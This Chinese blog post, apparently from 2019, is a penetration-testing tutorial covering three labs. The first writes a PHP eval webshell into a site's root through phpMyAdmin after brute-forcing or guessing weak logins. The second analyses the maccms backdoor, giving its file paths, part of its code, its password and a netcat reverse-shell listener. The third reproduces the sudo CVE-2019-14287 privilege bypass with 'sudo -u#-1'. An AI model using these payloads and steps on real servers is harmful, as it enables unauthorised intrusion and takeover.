三个渗透测试实验

仅供学习参考!!!

1.通过phpmyadmin获取服务器权限(getshell)

step1:通过google hacking找phpmyadmin
step2:爆破或者弱口令登录,show global variables like '%secure_file_priv%';判断我们有权限去写木马文件;
step3:如果该安全选项没有限制或者限制不严格,可以往站点根目录去写木马select "<?php @eval($_POST[_]);?>"into outfile "D:\\phpstudy_pro\\www\\evil.php"
select "<?php @eval($_POST[_]);?>"into outfile "/var/www/html/shell.php"
step4:通过webshell工具(中国菜刀、冰蝎、蚁剑)去控制服务器
2.maccms后门分析
maccms网站基于php+mysql的系统,易用性、功能良好等优点,用途广。
木马所在位置:extend/Qcloud/Sms/Sms.php、extend\upyun\src\Upyun\Api
打开源码:
<?php
error_reporting(E_ERROR);
@ini_set('display_errors','Off');
@ini_set('max_execution_time',20000);
@ini_set('memory_limit','256M');
header("content-Type: text/html; charset=utf-8");
$password = "0d41c75e2ab34a3740834cdd7e066d90";//WorldFilledWithLove,经过md5解密后的结果
。.
浏览器访问两个文件可以看到后门网站,使用上述密码可以登陆
反弹shell(将肉鸡/目标机上的终端或者解析器或shell弹到攻击者的电脑中,注意需要攻击者提前监听,使用NC监听:nc -lvvp 7777,-l 表示本地)
3.sudo提权漏洞(CVE-2019-14287)复现:
sudo是linux系统命令,让普通账号以root身份去执行某些命令,比如安装软件、查看某些配置文件、关机、重启等操作,如果普通账号需要使用sudo需要修改配置文件/etc/sudoers,将sudo使用权限赋予该账号
sudo提权漏洞是一个安全策略绕过问题,去执行某些敏感的命令,CVE编号是VCE-2019-14287,影响的版本是:<1.8.28
 
漏洞复现过程:
        step1:查看版本:sudo -V
 
        step2:修改配置文件:vim /etc/sudoers在root ALL=(ALL:ALL)ALL下面添加一行配置test ALL=(ALL,!root)ALL
                    需要提前创建test:useradd test    passwd test
        注意:test表示test用户,第一个ALL表示该用户可以在任意地方可以使用sudo,第二个(ALL,!root)表示命令可以被除了root以外的任意用户执行。最后面的ALL表示被允许执行;整体:test用户可以使用sudo,但是除了root以外的任意用户去执行命令
    
    step3:切换到test用户,su test ,然后sudo id(查看root的id),发现没有权限去执行。使用如下的命令执行我们想执行的命令:sudo -u#数字 命令   其中数字范围:-1~4294967295,命令是系统命令
 
如果以root身份去执行命令,数字使用-1和4294967295
 
修复方法:更新sudo 版本>=1.8.28
总结:该漏洞比较鸡肋,需要管理员修改配置文件
posted @ 2019-10-16 14:04  默忆  阅读(498)  评论(0编辑  收藏  举报